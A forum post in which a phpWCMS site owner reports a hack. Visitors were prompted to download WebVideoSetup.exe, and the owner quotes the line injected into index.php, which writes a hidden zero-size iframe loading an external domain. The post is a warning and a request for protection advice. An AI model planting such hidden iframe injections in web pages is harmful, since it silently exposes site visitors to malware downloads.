Opening WebVideoSetup.exe in the banner, then "You have chosen to open WebVideoSetup.exe which is an application from http:18.104.22.168. Would you like to save this file?" The window has a standard save button and the red X to close the window. I did not open the application but one of my viewer did and got a lot of ****.
I reviewed the files and found the following coded that had been added to index.php.
Code: Select all
// OR // echo spacer(5)."<br /><span class=\"v09\"> created in ".($timer->get_current('main'))." sec</span>"; echo '<iframe src="http://killbill.coolpage.biz/" width=0 height=0></iframe>'; echo "</body>\n</html>";
I replaced the hacked index with the regular index and the problem stopped. The intent of the posting is a warning to others but I have a couple of questions.
1. This is an older version. I am running 1.3.5 on other sites but have not upgraded this installation http://www.leoff1.net as yet. Will upgrading protect me from such hacks.
2. How do they do it?
3. Are my other phpWCMS sites in danger of the same attack and how do I protect them?
Thanks for any help, information or comments.